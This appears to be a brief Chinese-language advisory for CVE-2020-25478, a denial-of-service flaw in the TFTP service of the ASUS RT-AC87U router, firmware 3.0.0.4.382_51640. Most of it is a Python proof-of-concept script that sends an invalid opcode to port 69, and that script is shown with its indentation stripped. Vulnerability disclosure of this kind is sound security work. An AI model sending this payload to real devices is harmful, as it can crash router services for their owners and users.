CVE-2020-25478 - ASUS RT-AC87U TFTP 存在拒绝服务(DoS)攻击漏洞
ASUS RT-AC87U 3.0.0.4.382_51640
该问题主要与 CWE-20 相关。当向 ASUS RT-AC87U 中运行的 TFTP 服务发送无效操作码(opcode)时,该服务存在拒绝服务(DoS)攻击漏洞。以下 Python 代码片段用于测试该漏洞:
import socket
import sys
tftpd = ('192.168.1.1', 69)
#Try and open an UDP SOCKET
try:
tftp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print("Failed on socket creation, so exiting")
sys.exit(1)
#create a invalid opcode exeeding the 2 byte length
# opcode operation
# 1 Read request (RRQ)
# 2 Write request (WRQ)
# 3 Data (DATA)
# 4 Acknowledgment (ACK)
# 5 Error (ERROR)
invalidOpcode = "0000"
tftp.sendto(invalidOpcode,tftpd)
3. 描述
ASUS RT-AC87U 版本 3.0.0.4.382_51640 的 TFTP 服务存在拒绝服务攻击漏洞,可导致 TFTP 服务崩溃。TFTP 服务容易因远程发送无效操作码(opcode)而崩溃。
https://www.asus.com/content/ASUS-Product-Security-Advisory/